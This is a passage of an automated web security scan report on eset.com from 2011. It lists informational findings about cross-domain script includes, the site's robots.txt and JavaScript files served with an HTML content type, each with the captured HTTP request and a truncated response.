Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.7.10.1300715138; mbox=check#true#1300715233|session#1300715160014-248282#1300717033|PC#1300715160014-248282.17#1301924773; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716973362%3B%20gpv_pageName%3Dus/us/new_homepage%7C1300716973366%3B%20s_nr%3D1300715173368-New%7C1332251173368%3B%20s_invisit%3Dtrue%7C1300716973372%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/us/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 24961
Date: Mon, 21 Mar 2011 13:46:15 GMT
X-Varnish: 451499234
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div style="padding:3px 0 20px 0">
                       <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.8. http://www.eset.com/us/partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/partners

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/partners HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1300715224|session#1300715160014-248282#1300717024|PC#1300715160014-248282.17#1301924764; __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.3.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716963989%3B%20gpv_pageName%3Dus/business/products%7C1300716963992%3B%20s_nr%3D1300715163994-New%7C1332251163994%3B%20s_invisit%3Dtrue%7C1300716963998%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13322
Date: Mon, 21 Mar 2011 13:46:07 GMT
X-Varnish: 451498683
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.9. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38145
Date: Mon, 21 Mar 2011 13:46:03 GMT
X-Varnish: 451498404
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.10. http://www.eset.com/us/styles/store-new.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/styles/store-new.css

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/styles/store-new.css HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=deleted; expires=Sun, 21-Mar-2010 13:46:04 GMT
Set-Cookie: tnt=2; expires=Fri, 20-May-2011 13:46:05 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26572
Date: Mon, 21 Mar 2011 13:46:05 GMT
X-Varnish: 451498549
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

7. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.eset.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 17 Mar 2011 16:39:36 GMT
ETag: "1297-49eb04e8ae200"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 4759
Date: Mon, 21 Mar 2011 13:45:35 GMT
X-Varnish: 451497180
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

User-agent: *

Disallow: /*?print=1$

#=== SITEMAP LIST === (everything behind this line will be deleted ;-)
Sitemap: http://www.eset.com/sk/sitemap.xml
Sitemap: http://www.eset.com/sk/domacnosti/site
...[SNIP]...

8. Content type incorrectly stated  previous
There are 12 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


8.1. http://www.eset.com/us/scripts/business.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/business.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/business.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Mar 2011 13:46:03 GMT
X-Varnish: 451498398
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 2209

var ESET_Business = {
init: function() {
// check for product dropdowns
if($('business_dropdown_eav')) {
this.setProductDropdown('eav');
}
if($('business_dropdown_eavmac'
...[SNIP]...

8.2. http://www.eset.com/us/scripts/common.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/common.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/common.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Mar 2011 13:45:36 GMT
X-Varnish: 451497212
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 933

var Common = {};

Common.Ticker = new Class({
Implements: Options,
options: {
items: [],
link_id: 'ticker-link',
duration: 4000
},

initialize: function(id, options) {

...[SNIP]...

8.3. http://www.eset.com/us/scripts/download.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/download.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/download.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/download
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1300715224|session#1300715160014-248282#1300717024|PC#1300715160014-248282.17#1301924764; __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.3.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716963989%3B%20gpv_pageName%3Dus/business/products%7C1300716963992%3B%20s_nr%3D1300715163994-New%7C1332251163994%3B%20s_invisit%3Dtrue%7C1300716963998%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Mar 2011 13:46:08 GMT
X-Varnish: 451498733
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 5842

var ESET_Download = {
event_name: '',
selected_tab: '',
selected_section: '',
slides: [],
language_active: false,
language_delay: 250,
language_opacity: .9,
language: 'eng',

init:
...[SNIP]...

8.4. http://www.eset.com/us/scripts/lib/autocompleter/Autocompleter.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/autocompleter/Autocompleter.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/autocompleter/Autocompleter.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Mar 2011 13:45:36 GMT
X-Varnish: 451497214
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 10881

var Observer=new Class({Implements:[Options,Events],options:{periodical:false,delay:1000},initialize:function(c,a,b){this.element=$(c)||$$(c);this.addEvent("onFired",a);this.setOptions(b);this.bound=t
...[SNIP]...

8.5. http://www.eset.com/us/scripts/lib/jq-promo-lib.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/jq-promo-lib.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/jq-promo-lib.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1300715224|session#1300715160014-248282#1300717024|PC#1300715160014-248282.17#1301924764; __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.3.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716963989%3B%20gpv_pageName%3Dus/business/products%7C1300716963992%3B%20s_nr%3D1300715163994-New%7C1332251163994%3B%20s_invisit%3Dtrue%7C1300716963998%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Mar 2011 13:46:07 GMT
X-Varnish: 451498688
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 154

var j = jQuery.noConflict();

j(document).ready(function(){
   j('.promoRadio').click(function(){
       j('.promocode').val(j(this).attr('alt'));
   });
});

8.6. http://www.eset.com/us/scripts/lib/jq.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/jq.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/jq.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Mar 2011 13:45:34 GMT
X-Varnish: 451497166
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 78768

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

8.7. http://www.eset.com/us/scripts/lib/mbox.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/mbox.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/mbox.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Mar 2011 13:46:00 GMT
X-Varnish: 451498128
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 20200

var mboxCopyright = "&copy; 1996-2008. Omniture, Inc. All rights reserved.";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return e; }; this.f =
...[SNIP]...

8.8. http://www.eset.com/us/scripts/lib/mootools-1.2.3-core-yc.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/mootools-1.2.3-core-yc.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/mootools-1.2.3-core-yc.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Mar 2011 13:45:36 GMT
X-Varnish: 451497213
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 66610

//MooTools, <http://mootools.net>, My Object Oriented (JavaScript) Tools. Copyright (c) 2006-2009 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:"1.2.3",build:"4980
...[SNIP]...

8.9. http://www.eset.com/us/scripts/lib/mootools-1.2.3.1-more.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/mootools-1.2.3.1-more.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /us/scripts/lib/mootools-1.2.3.1-more.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/download
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1300715224|session#1300715160014-248282#1300717024|PC#1300715160014-248282.17#1301924764; __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.3.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716963989%3B%20gpv_pageName%3Dus/business/products%7C1300716963992%3B%20s_nr%3D1300715163994-New%7C1332251163994%3B%20s_invisit%3Dtrue%7C1300716963998%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Mar 2011 13:46:07 GMT
X-Varnish: 451498696
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 2977

//MooTools More, <http://mootools.net/more>. Copyright (c) 2006-2009 Aaron Newton <http://clientcide.com/>, Valerio Proietti <http://mad4milk.net> & the MooTools team <http://mootools.net/developers>,
...[SNIP]...

8.10. http://www.eset.com/us/scripts/lib/s_code3.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/s_code3.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/s_code3.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Mar 2011 13:45:36 GMT
X-Varnish: 451497210
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 80131


/* SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES ***********
...[SNIP]...

8.11. http://www.eset.com/us/scripts/store.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/store.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/store.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1300715224|session#1300715160014-248282#1300717024|PC#1300715160014-248282.17#1301924764; __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.3.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716963989%3B%20gpv_pageName%3Dus/business/products%7C1300716963992%3B%20s_nr%3D1300715163994-New%7C1332251163994%3B%20s_invisit%3Dtrue%7C1300716963998%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Mar 2011 13:46:07 GMT
X-Varnish: 451498667
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 10967

var ESET_Store = {
selected: [],
renew_prices: {},
eav_radio_checked: false,
ess_radio_checked: false,


init: function() {
this.setTabEvents();
this.setRenewQuantity();
...[SNIP]...

8.12. http://www.eset.com/us/scripts/trial.js  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/trial.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/trial.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/download/free-trial/nod32-antivirus
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
